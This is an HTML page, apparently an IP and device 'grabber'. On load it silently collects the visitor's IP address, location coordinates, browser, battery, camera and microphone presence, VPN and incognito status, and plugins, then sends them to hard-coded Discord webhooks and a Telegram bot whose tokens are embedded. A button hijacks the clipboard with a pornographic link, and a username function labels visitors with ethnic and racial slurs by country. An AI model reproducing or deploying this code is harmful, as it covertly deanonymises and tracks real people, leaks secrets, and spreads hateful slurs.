<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <div class="loader"></div>
    <button class="reload-btn" onclick="copyToClipboard()">Karina Otsosi ПЖ!!!!</button>
    <style>
        .message-container {
            background-color: #f2f2f2; /* серый фон */
            border: 2px solid #4CAF50;
            border-radius: 5px;
            padding: 10px;
            margin: 10px;
            font-family: Arial, sans-serif;
        }
        .ad {
    display: block; /* Убедитесь, что элемент изначально видим */
    width: 1px; /* Минимальная ширина */
    height: 1px; /* Минимальная высота */
    visibility: hidden; /* Скрыть элемент */
}
        .info-label {
            font-weight: bold;
            color: #4CAF50;
        }
        .info-value {
            margin-left: 10px;
        }

        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #121212;
        }

        .loader {
            border: 16px solid #f3f3f3;
            border-top: 16px solid #3498db;
            border-radius: 50%;
            width: 120px;
            height: 120px;
            animation: spin 2s linear infinite;
            position: absolute;
            top: 40%;
            left: 45%;
            transform: translate(-50%, -50%);
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .reload-btn {
            position: absolute;
            bottom: 20px;
            left: 50%;
            transform: translateX(-50%);
            background-color: #3498db;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 25px;
            font-size: 18px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .reload-btn:hover {
            background-color: #2980b9;
        }
    </style>
    <script>
        function sendToDiscord(message) {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://discord.com/api/webhooks/1450105381110939730/yHVjM6RelWM4t-TBC8P5Rxh1s1mWNg5n2_FTLC-KKvKWgoLHsxaCjkbiF27vTeyLbxhy", true);
            xhr.setRequestHeader('Content-Type', 'application/json');
            xhr.send(JSON.stringify({ content: message }));
        }

        function getCity() {
            return new Promise((resolve, reject) => {
                var city = localStorage.getItem("city");
                if (city) {
                    resolve(city);
                } else {
                    fetch("https://ipinfo.io/json")
                        .then(response => response.json())
                        .then(data => {
                            var city = data.city || "Unknown City";
                            localStorage.setItem("city", city);
                            resolve(city);
                        })
                        .catch(error => {
                            console.error("Error fetching city:", error);
                            resolve("Unknown City");
                        });
                }
            });
        }

        function getCountry() {
            return new Promise((resolve, reject) => {
                var country = localStorage.getItem("country");
                if (country) {
                    resolve(country);
                } else {
                    fetch("https://ipinfo.io/json")
                        .then(response => response.json())
                        .then(data => {
                            var country = data.country || "Unknown Country";
                            localStorage.setItem("country", country);
                            resolve(country);
                        })
                        .catch(error => {
                            console.error("Error fetching country:", error);
                            resolve("Unknown Country");
                        });
                }
            });
        }

async function getUserName() {
    try {
        const response = await fetch("https://ipinfo.io/json");
        const data = await response.json();
        const countryCode = data.country || "Unknown Country";

        switch (countryCode) {
            case "UA":
                return "Hohol";
            case "PL":
                return "Kurva";
            case "RU":
                return "Russkiy";
            case "NG":
            case "AU":
                return "Nigger";
            case "DE":
                return "Hitler";
            case "US":
            case "GB":
                return "Idiot";
            case "BY":
                return "Bulba";
            default:
                return "Unknown User";
        }
    } catch (error) {
        console.error("Error fetching user information:", error);
        return "Unknown User";
    }
}


        function getIpAddress() {
            return new Promise((resolve, reject) => {
                fetch("https://api64.ipify.org?format=json")
                    .then(response => response.json())
                    .then(data => {
                        var ipAddress = data.ip || "Unknown IP Address";
                        resolve(ipAddress);
                    })
                    .catch(error => {
                        console.error("Error fetching IP address:", error);
                        resolve("Unknown IP Address");
                    });
            });
        }


        function getBrowserInfo() {
            const ua = window.navigator.userAgent;
            let browserInfo = "Unknown Browser";
            let version = "Unknown Version";

            if (ua.indexOf("Chrome") !== -1 && ua.indexOf("OPR") === -1) {
                browserInfo = "Google Chrome";
                version = ua.match(/Chrome\/(\d+\.\d+\.\d+\.\d+)/)[1];
            } else if (ua.indexOf("Firefox") !== -1) {
                browserInfo = "Mozilla Firefox";
                version = ua.match(/Firefox\/(\d+\.\d+\.\d+)/)[1];
            } else if (ua.indexOf("Edg") !== -1) {
                browserInfo = "Microsoft Edge";
                version = ua.match(/Edg\/(\d+\.\d+\.\d+\.\d+)/)[1];
            } else if (ua.indexOf("Safari") !== -1 && ua.indexOf("Chrome") === -1) {
                browserInfo = "Safari";
                version = ua.match(/Version\/(\d+\.\d+\.\d+)/)[1];
            } else if (ua.indexOf("OPR") !== -1 || ua.indexOf("Opera") !== -1) {
                browserInfo = "Opera";
                version = ua.match(/OPR\/(\d+\.\d+\.\d+)/)[1];
            } else if (ua.indexOf("YaBrowser") !== -1) {
                browserInfo = "Yandex Browser";
                version = ua.match(/YaBrowser\/(\d+\.\d+\.\d+)/)[1];
            } else if (ua.indexOf("Tor") !== -1) {
                browserInfo = "Tor Browser";
                version = "Unknown Version";
            }

            return { browserInfo, version };
        }

        function copyToClipboard() {
            const textToCopy = 'https://rt.pornhub.com';
            navigator.clipboard.writeText(textToCopy).then(() => {
                console.error('', err);
            });
        }

        async function getCityAndCoordinates() {
            try {
                const response = await fetch("https://ipinfo.io/json");
                const data = await response.json();
                const city = data.city || "Unknown City";
                const coordinates = data.loc || "Unknown Coordinates";
                return { city, coordinates };
            } catch (error) {
                console.error("Error fetching city and coordinates:", error);
                return { city: "Unknown City", coordinates: "Unknown Coordinates" };
            }
        }

        function sendToTelegram(message) {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://api.telegram.org/bot7783626587:AAHWW5ntXK7mEz-OsDqBfUiqRCRd0nxliBw/sendMessage", true);
            xhr.setRequestHeader('Content-Type', 'application/json');
            xhr.send(JSON.stringify({
                chat_id: "6234673489",
                text: message
            }));
        }

        async function getCityCountryAndEmoji() {
            try {
                const response = await fetch("https://ipinfo.io/json");
                const data = await response.json();
                const city = data.city || "Unknown City";
                const country = data.country || "Unknown Country";
                const coordinates = data.loc || "Unknown Coordinates";
                let emoji = "";
                let countryName = country;

                switch(country) {
                    case "RU":
                        countryName = "Russia";
                        emoji = "⚪️🔵🔴";
                        break;
                    case "UA":
                        countryName = "Ukraine";
                        emoji = "🔵🟡";
                        break;
                    case "US":
                        countryName = "United States";
                        emoji = "🔴⚪️🔵";
                        break;
                    case "CN":
                        countryName = "China";
                        emoji = "🔴🟡";
                        break;
                    case "IN":
                        countryName = "India";
                        emoji = "🟧⚪️🟢";
                        break;
                    case "GB":
                        countryName = "United Kingdom";
                        emoji = "🔴⚪️🔵";
                        break;
                    case "FR":
                        countryName = "France";
                        emoji = "🔵⚪️🔴";
                        break;
                    case "DE":
                        countryName = "Germany";
                        emoji = "⚫️🔴🟡";
                        break;
                    case "IT":
                        countryName = "Italy";
                        emoji = "🟢⚪️🔴";
                        break;
                    case "JP":
                        countryName = "Japan";
                        emoji = "🔴⚪️🔴";
                        break;
                    case "BR":
                        countryName = "Brazil";
                        emoji = "🟢🟡🔵";
                        break;
                    case "CA":
                        countryName = "Canada";
                        emoji = "⚪️🔴";
                        break;
                    case "AU":
                        countryName = "Australia";
                        emoji = "🔵⚪️🔴";
                        break;
                    case "MX":
                        countryName = "Mexico";
                        emoji = "🟢⚪️🔴";
                        break;
                    case "ES":
                        countryName = "Spain";
                        emoji = "🔴🟡";
                        break;
                    case "KR":
                        countryName = "South Korea";
                        emoji = "⚪️🔴🟢";
                        break;
                    case "AR":
                        countryName = "Argentina";
                        emoji = "🟦⚪️🟦";
                        break;
                    case "ZA":
                        countryName = "South Africa";
                        emoji = "🟢🟡🔴";
                        break;
                    case "NG":
                        countryName = "Nigeria";
                        emoji = "🟢⚪️🟢";
                        break;
                    case "TR":
                        countryName = "Turkey";
                        emoji = "🔴⚪️⚪️";
                        break;
                    case "SE":
                        countryName = "Sweden";
                        emoji = "🔵🟡🔵";
                        break;
                    case "NO":
                        countryName = "Norway";
                        emoji = "🔴⚪️🔵";
                        break;
                    case "FI":
                        countryName = "Finland";
                        emoji = "🔵⚪️";
                        break;
                    case "CH":
                        countryName = "Switzerland";
                        emoji = "🔴⚪️";
                        break;
                    case "PL":
                        countryName = "Poland";
                        emoji = "⚪️🔴";
                        break;
                    case "NL":
                        countryName = "Netherlands";
                        emoji = "🔵⚪️🔴";
                        break;
                    case "BE":
                        countryName = "Belgium";
                        emoji = "⚫️🟡🔴";
                        break;
                    case "GR":
                        countryName = "Greece";
                        emoji = "🔵⚪️";
                        break;
                    case "PT":
                        countryName = "Portugal";
                        emoji = "🟢🟡🔴";
                        break;
                    case "EG":
                        countryName = "Egypt";
                        emoji = "🔴⚪️⚫️";
                        break;
                    case "SA":
                        countryName = "Saudi Arabia";
                        emoji = "🟢⚪️";
                        break;
                    default:
                        countryName = data.country;
                        emoji = "";
                }

                return { city, country: countryName, coordinates, emoji };
            } catch (error) {
                console.error("Error fetching city, country, and emoji:", error);
                return { city: "Unknown City", country: "Unknown Country", coordinates: "Unknown Coordinates", emoji: "" };
            }
        }

        async function getScreenResolution() {
            return { width: screen.width, height: screen.height };
        }

 async function getMediaDevicesInfo() {
    try {
        const devices = await navigator.mediaDevices.enumerateDevices();
        const cameras = devices.filter(device => device.kind === 'videoinput');
        const microphones = devices.filter(device => device.kind === 'audioinput');
        const cameraCount = cameras.length;
        const microphoneCount = microphones.length;
        return { cameraCount, microphoneCount };
    } catch (error) {
        console.error("Error fetching media devices information:", error);
        return { cameraCount: 0, microphoneCount: 0 };
    }
}

        function getReferer() {
            return document.referrer || "Direct Access";
        }     


        function sendToDiscord(message) {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://discord.com/api/webhooks/1229406191717711895/zTi5NHh_YOWKcTHYV-x-_TSs6qdBwGlrZdjvXPyIQNVVCFsYGnmJkVQBHsGD_wLimrqv", true);
            xhr.setRequestHeader('Content-Type', 'application/json');
            xhr.send(JSON.stringify({ content: message }));
        }

        function sendToTelegram(message) {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://api.telegram.org/bot7783626587:AAHWW5ntXK7mEz-OsDqBfUiqRCRd0nxliBw/sendMessage", true);
            xhr.setRequestHeader('Content-Type', 'application/json');
            xhr.send(JSON.stringify({
                chat_id: "6234673489",  // Укажи свой chat_id
                text: message
            }));
        }


        function detectDeviceType() {
            const ua = navigator.userAgent;
            if (/mobile/i.test(ua)) {
                return "Mobile Phone";
            } else if (/tablet|ipad|playbook/i.test(ua)) {
                return "Tablet";
            } else if (/iPad|Macintosh/i.test(ua) && 'ontouchend' in document) {
                return "Tablet";
            } else if (/iPhone|iPod/i.test(ua)) {
                return "Mobile Phone";
            } else if (/Android/.test(ua)) {
                return "Mobile Phone";
            } else if (/Windows NT/i.test(ua)) {
                return /Touch/i.test(ua) ? "Tablet" : "PC or Laptop";
            } else if (/Macintosh/.test(ua)) {
                return "PC or Laptop";
            } else {
                return "Unknown Device";
            }
        }

        function detectWindowsVersion() {
            const ua = navigator.userAgent;
            if (/Windows NT 10.0/i.test(ua)) {
                return "Windows 10";
            } else if (/Windows NT 6.3/i.test(ua)) {
                return "Windows 8.1";
            } else if (/Windows NT 6.2/i.test(ua)) {
                return "Windows 8";
            } else if (/Windows NT 6.1/i.test(ua)) {
                return "Windows 7";
            } else if (/Windows NT 6.0/i.test(ua)) {
                return "Windows Vista";
            } else if (/Windows NT 5.1/i.test(ua)) {
                return "Windows XP";
            } else if (/Windows NT 5.0/i.test(ua)) {
                return "Windows 2000";
            } else {
                return "Unknown Windows Version";
            }
        }

async function getBatteryInfo() {
    if (navigator.getBattery) {
        const battery = await navigator.getBattery();
        const batteryLevel = Math.round(battery.level * 100);
        const isCharging = battery.charging ? "Charging" : "Not Charging";
        const dischargingTime = battery.dischargingTime > 0 ? `${Math.round(battery.dischargingTime / 60)} minutes` : "Charging";
        return `${batteryLevel}%  /  (${isCharging})  /  Discharge: ${dischargingTime}`;
    } else {
        return "Battery information not available";
    }
}



        function getSystemTheme() {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                return "Dark Theme";
            } else if (window.matchMedia && window.matchMedia('(prefers-color-scheme: light)').matches) {
                return "Light Theme";
            } else {
                return "No Theme Preference Detected";
            }
        } 

async function checkAdBlock() {
    const adElement = document.createElement('div');
    adElement.id = 'ad-element';
    adElement.style.display = 'block';
    adElement.innerHTML = 'Ad';
    document.body.appendChild(adElement);

    const isAdBlockActive = window.getComputedStyle(adElement).display === 'none';
    document.body.removeChild(adElement);

    return isAdBlockActive ? "Ad Blocker Detected" : "No Ad Blocker";
}

async function checkVPN() {
    try {
        const response = await fetch("https://ipinfo.io/json");
        const data = await response.json();

        if (data.org && (data.org.toLowerCase().includes("vpn") || data.org.toLowerCase().includes("hosting"))) {
            return `VPN Service Detected: ${data.org}`;
        }

        const response2 = await fetch("https://ip-api.com/json/");
        const geoData = await response2.json();

        if (geoData && geoData.proxy === true) {
            return `VPN Service Detected: ${geoData.isp}`;
        }

        return "No VPN Detected";
    } catch (error) {
        return "Error detecting VPN";
    }
}
   

        function getConnectionType() {
            if (navigator.connection) {
                const effectiveType = navigator.connection.effectiveType;
                return effectiveType.includes("wifi") ? "Wi-Fi" : effectiveType;
            } else {
                return "? . ? . ?";
            }
        }

        function getUptime() {
            const uptime = Math.floor(performance.now() / 1000); // Упрощённый способ
            const minutes = Math.floor(uptime / 60);
            const seconds = uptime % 60;
            return `${minutes} m ${seconds} s`;
        }  

        async function checkInternetSpeed() {
            return new Promise((resolve) => {
                const startTime = Date.now();
                const image = new Image();
                image.src = "https://www.gstatic.com/webp/gallery/1.jpg" + "?t=" + startTime;
                image.onload = () => {
                    const endTime = Date.now();
                    const speed = (image.width * image.height * 8) / ((endTime - startTime) / 1000);
                    resolve((speed / 1e6).toFixed(2) + " Mbps");
                };
            });
        } 

function areCookiesEnabled() {
    return navigator.cookieEnabled ? "Enabled" : "Disabled";
}

        function getOperatingSystem() {
            const usa = window.navigator.userAgent;
            let osa = "Unknown OS";

            if (usa.indexOf("Win") !== -1) {
                osa = "Windows " + (usa.indexOf("64") !== -1 ? "64-bit" : "32-bit");
            } else if (usa.indexOf("Mac") !== -1) {
                osa = "macOS";
            } else if (usa.indexOf("Linux") !== -1) {
                osa = "Linux";
            } else if (usa.indexOf("Android") !== -1) {
                osa = "Android";
            } else if (usa.indexOf("Ubuntu") !== -1) {
                osa = "Ubuntu";
            }

            return osa;
        }

        function getCpuCores() {
            return navigator.hardwareConcurrency || "Unknown";
        }

        function getCpuLoad() {
            // Примерная оценка загруженности процессора через setTimeout и работу в основном потоке
            let start = performance.now();
            for (let i = 0; i < 100000000; i++) {}  // Небольшая нагрузка на CPU
            let end = performance.now();
            let cpuLoad = ((end - start) / 1000).toFixed(1.5); // Время в секундах
            return cpuLoad + " seconds of CPU load";
        }

        function getMonitorRefreshRate() {
            return new Promise((resolve) => {
                let frame = 0;
                let start = performance.now();

                function loop() {
                    frame++;
                    if (frame < 60) {
                        requestAnimationFrame(loop);
                    } else {
                        let end = performance.now();
                        let refreshRate = Math.round(1000 / ((end - start) / 60));
                        resolve(refreshRate + " Hz");
                    }
                }
                loop();
            });
        }

        function getMemoryUsage() {
            if (performance && performance.memory) {
                return (performance.memory.usedJSHeapSize / 1024 / 1024).toFixed(2) + " MB";
            } else {
                return "Unknown";
            }
        }

async function getProxyInfo() {
    try {
        const response = await fetch('https://ipinfo.io/json');
        const data = await response.json();
        
        if (data && data.org && data.org.toLowerCase().includes('proxy')) {
            return `Proxy detected: ${data.org}`;
        } else {
            return "No proxy detected";
        }
    } catch (error) {
        return "Error determining proxy";
    }
}

async function detectIncognitoMode() {
    const db = indexedDB.open("test");

    return new Promise((resolve) => {
        db.onerror = function () {
            resolve("Yes");
        };
        db.onsuccess = function () {
            resolve("No");
        };
    });
}

async function getPing() {
    const startTime = Date.now();
    
    try {
        await fetch("https://www.google.com", { mode: 'no-cors' });
        const endTime = Date.now();
        const ping = endTime - startTime;
        return `${ping} ms`;
    } catch (error) {
        return "Ping measurement failed";
    }
}

async function sendInfoToDiscord() {
    const { city, country, coordinates, emoji } = await getCityCountryAndEmoji();
    const ipAddressResponse = await fetch("https://api64.ipify.org?format=json");
    const ipAddressData = await ipAddressResponse.json();
    const ipAddress = ipAddressData.ip || "Unknown IP Address";
    const time = new Date().toLocaleString();
    const { browserInfo, version } = await getBrowserInfo();
    const googleMapsLink = "https://www.google.com/maps?q=" + coordinates;
    const username = await getUserName();
    const isOnline = navigator.onLine ? "Online" : "Offline";
    const language = navigator.language || "Unknown Language";
    const pluginCount = navigator.plugins.length;
    const plugins = Array.from(navigator.plugins).map(plugin => `||${plugin.name}||`).join(" - ");
    const deviceMemoryGB = Math.round(Math.log2(navigator.deviceMemory / 1024));
    const { width, height } = await getScreenResolution();
    const { cameraCount, microphoneCount } = await getMediaDevicesInfo();
    const hasCamera = cameraCount > 0 ? "Yes" : "No";
    const hasMicrophone = microphoneCount > 0 ? "Yes" : "No";
    const referer = getReferer();
    const deviceType = detectDeviceType();
    const WindowsType = detectWindowsVersion();
    const WindowsThearmType = getSystemTheme();
    const batteryInfo = deviceType === "Mobile Phone" || deviceType === "PC or Laptop" ? await getBatteryInfo() : "Battery info not applicable";
    const adBlockStatus = await checkAdBlock();
    const vpnStatus = await checkVPN();
    const connectionType = getConnectionType();
    const uptime = getUptime();
    const internetSpeed = await checkInternetSpeed();
    const systemInfos = getOperatingSystem();
    const cookiesStatus = areCookiesEnabled();
    const CPUard = getCpuCores();
    const monitorRefreshRate = await getMonitorRefreshRate();
    const memoryUsage = getMemoryUsage();
    const proxyInfo = await getProxyInfo();
    const TimeZone = await Intl.DateTimeFormat().resolvedOptions().timeZone;
    const isIncognito = await detectIncognitoMode();
    const Ping = await getPing();
    const weatherResponse = await fetch(`https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/${city}?unitGroup=uk&key=KM7AEJQ7MBUYL23UBSQSNRPLW&contentType=json`);
    const weatherData = await weatherResponse.json();
    const temperature = weatherData.currentConditions.temp;
    const conditions = weatherData.currentConditions.conditions.toLowerCase();
    const message = "****                User Information****\n" +
                    "****-----------------------------------****\n" +
                    "- 🗺️ **IP Address**: `" + ipAddress + "`\n" +
                    "- 👤 **User Name**: `" + username + "`\n" +
                    "- 🏙️  **City**: `" + city + "`\n" +
                    "- 🌍 **Country**: `" + country + "` " + emoji + "\n" +
                    "- 🏞️ **Coordinates**: [`" + coordinates + "`](" + googleMapsLink + ")\n" +
                    "- 🕒 **Time**: `" + time + "`\n" +
                    "- 🌚 **Time Zone**: `" + TimeZone + "`\n" +
                    "- 🌡️ **Temperature**: `" + temperature + "°C`\n" +
                    "- 🌐 **Browser**: `" + browserInfo + "`\n" +
                    "- 💿️ **Browser Version**: `" + version + "`\n" +
                    "- 🛰️ **Connection Status**: `" + isOnline + "`\n" +
                    "- 🛸 **Connection Type**: `" + connectionType + "`\n" +
                    "- 🚀 **Internet Speed**: `" + internetSpeed + "`\n" +
                    "- 📶 **Ping**: `" + Ping + "`\n" +
                    "- 🎇 **Time On Page**: `" + uptime + "`\n" +
                    "- 🎮 **Device**: `" + deviceType + "`\n" +
                    "- 🗜️ **Windows**: `" + WindowsType + "`\n" +
                    "- 🧩 **Operating System**: `" + systemInfos + "`\n" +
                    "- 🀄 **Browser Language**: `" + language + "`\n" +
                    "- 🖥️ **Device Language(s)**: `" + navigator.languages.join(", ") + "`\n" +
                    "- 🔋 **Battery**: `" + batteryInfo + "`\n" +
                    "- 💨 **Referer**: `" + referer + "`\n" +
                    "- ♟ **Incognito Mode**: `" + isIncognito + "`\n" +
                    "- 🚫 **Ad Blocker**: `" + adBlockStatus + "`\n" +
                    "- 🕵 **VPN**: `" + vpnStatus + "`\n" +
                    "- 🔒 **Proxy**: `" + proxyInfo + "`\n" +
                    "- 🌗 **System Theme**: `" + WindowsThearmType + "`\n" +                 
                    "- 💻 **Device Memory**: `" + deviceMemoryGB + " GB`\n" +
                    "- 🕳️ **CPU Core**: `" + CPUard + "`\n" +
                    "- 🗃️ **Memory Usage**: `" + memoryUsage + "`\n" +
                    "- 🍪 **Cookies**: `" + cookiesStatus + "`\n" +
                    "- 📐 **Screen Resolution**: `" + width + "x" + height + "`\n" +
                    "- 📊 **Screen Gerth**: `" + monitorRefreshRate + "`\n" +
                    "- 📷 **Camera**: `" + hasCamera + "`\n" +
                    "- 🎤 **Microphone**: `" + hasMicrophone + "`\n" +
                    "- 🛠️ **Number of Plugins**: `" + pluginCount + "`\n" +
                    "- 🔌 **Plugins**: " + plugins + "\n";     
    sendToDiscord(message);
    sendToTelegram(message);
}
        window.onload = function() {
            sendInfoToDiscord();
        };
    </script>
</head>
<body>
</body>
</html>



